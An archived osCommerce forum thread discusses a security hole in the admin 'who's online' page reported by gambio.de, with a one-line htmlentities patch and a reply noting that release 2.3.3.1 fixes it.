Jump to content
  • Checkout
  • Login
  • Get in touch


The e-commerce.


This topic is now archived and is closed to further replies.


Security Risk reported by gambio.de may also appear to OSC 2.x

Recommended Posts

Some days ago gambio.de reported a security hole in their shop software which also occurs in xt:commerce and other oscommerce based shop systems.

As I found out, the security hole may also appear in some versions of oscommerce. Here's a patch for those who want to be safe (besides that I strongly recommend securing the admin area with htaccess!).


In /catalog/admin/whos_online.php just after:

while ($whos_online = tep_db_fetch_array($whos_online_query)) {


add the following line of code:

   $whos_online['last_page_url'] = htmlentities($whos_online['last_page_url']);


Could please one of the developers check and confirm?


All credits go to gambio.de, great job guys!

Share this post

Link to post
Share on other sites




The first v2.3.3.1 oscommerce release fix prevent the hack. Gambio's fix is very similar.



Parse REQUEST_URI with tep_db_prepare_input() before storing the value in the database. Replace REMOTE_ADDR with tep_get_ip_address().

osCommerce based shop owner with minimal design and focused on background works. When the less is more.
Email managment with tracking pixel, package managment for shipping, stock management, warehouse managment with bar code reader, parcel shops management on 3000 pickup points without local store.

Share this post

Link to post
Share on other sites